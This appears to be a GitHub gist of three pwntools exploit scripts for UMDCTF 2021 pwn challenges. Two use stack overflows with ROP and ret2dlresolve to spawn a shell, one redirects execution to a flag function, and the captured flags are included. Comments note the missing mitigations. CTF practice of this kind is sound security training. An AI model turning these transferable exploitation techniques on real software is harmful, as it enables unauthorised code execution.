
@Error-200
Last active April 19, 2021 21:26
My exploits for UMDCTF 2021
from pwn import *
# UMDCTF 2021 "JIE": stack overflow -> ROP chain -> ret2dlresolve -> system("sh").
#
# What the script relies on (check each with checksec against ./JIE):
#   * 0x48 filler bytes are sent before the chain, so the author treats 0x48
#     as the distance from the buffer to the saved return address; the
#     target evidently accepts more input than the buffer holds.
#   * No canary or address leak is performed first, so the binary presumably
#     has no stack protector and is not PIE.
#   * ret2dlresolve forges relocation/symbol records and abuses lazy symbol
#     binding; linking with full RELRO (-z relro -z now) removes that path.
elf = context.binary = ELF('./JIE')
chain = ROP(elf)
ret_gadget = chain.find_gadget(['ret'])[0]
resolver = Ret2dlresolvePayload(elf, symbol='system', args=['sh'])

# A lone `ret` goes first, presumably to keep the stack 16-byte aligned for
# the calls that follow.
chain.raw(ret_gadget)
# gets() must be callable from the binary itself (no libc is loaded here);
# it reads the forged resolver structures into resolver.data_addr.
chain.gets(resolver.data_addr)
chain.ret2dlresolve(resolver)

# Always targets the event server; for a local run swap in process(elf.path).
io = remote('chals5.umdctf.io', 7001)

# Stage 1 (filler + chain) and stage 2 (resolver data) go out in one write.
# The newline between them closes the program's first line-based read
# (presumably gets() or similar -- confirm), leaving the rest of the bytes
# for the gets() call made by the chain.
stage = b''.join([
    b'A' * 0x48,
    chain.chain(),
    b'\n',
    resolver.payload,
])
io.sendline(stage)
io.interactive()
# ret2libc would also work here; this script is reused from JNW, which was
# solved first.
#UMDCTF-{Sh311c0d3_1s_The_B35T_p14c3_70_jump_70}
from pwn import *
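# UMDCTF 2021 "JNE": stack overflow that redirects the saved return address
# to a function already present in the binary (get_flag).
#
# What the script relies on (check each with checksec against ./JNE):
#   * 0x48 filler bytes precede the new return address, so the author treats
#     0x48 as the distance from the buffer to the saved return address.
#   * get_flag's address is taken straight from the ELF symbol table with no
#     leak, so the binary is presumably not PIE; p64 means a 64-bit target.
#   * No canary is leaked or preserved, so presumably no stack protector.
# A bounded read, -fstack-protector and PIE would each break this as written.
binary = context.binary = ELF('./JNE')

# Always targets the event server; for a local run use process(binary.path).
p = remote('chals5.umdctf.io', 7003)

payload = b'A' * 0x48 + p64(binary.sym.get_flag)

# The prompt is passed as bytes: pwntools tubes work on bytes, and a str
# delimiter is only coerced (with a BytesWarning) under Python 3.
p.sendlineafter(b'Where do you want to go?\n', payload)
p.interactive()
#UMDCTF-{wh323_423_WE_G01n9_n3xt?}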
from pwn import *
# UMDCTF 2021 "JNW": stack overflow -> ROP chain -> ret2dlresolve -> system("sh").
#
# What the script relies on (check each with checksec against ./JNW):
#   * 0x48 filler bytes are sent before the chain, so the author treats 0x48
#     as the distance from the buffer to the saved return address.
#   * No canary or address leak happens first, so the binary presumably has
#     no stack protector and is not PIE.
#   * ret2dlresolve depends on lazy symbol binding; a full-RELRO link
#     (-z relro -z now) removes it.
elf = context.binary = ELF('./JNW')
chain = ROP(elf)
ret_gadget = chain.find_gadget(['ret'])[0]
resolver = Ret2dlresolvePayload(elf, symbol='system', args=['sh'])

# Leading `ret` gadget: presumably stack-alignment padding for later calls.
chain.raw(ret_gadget)
# gets() (resolved from the binary itself) pulls the forged resolver
# structures into resolver.data_addr before the resolver is invoked.
chain.gets(resolver.data_addr)
chain.ret2dlresolve(resolver)

# Always targets the event server; for a local run swap in process(elf.path).
io = remote('chals5.umdctf.io', 7005)

# Both stages are sent in a single write; the newline after the chain ends
# the program's first line-based read (presumably -- confirm) so the
# resolver data is consumed by the gets() call in the chain.
stage = b''.join([
    b'A' * 0x48,
    chain.chain(),
    b'\n',
    resolver.payload,
])
io.sendline(stage)
io.interactive()
#UMDCTF-{JuMp_1s_N0w_w0RK1nG}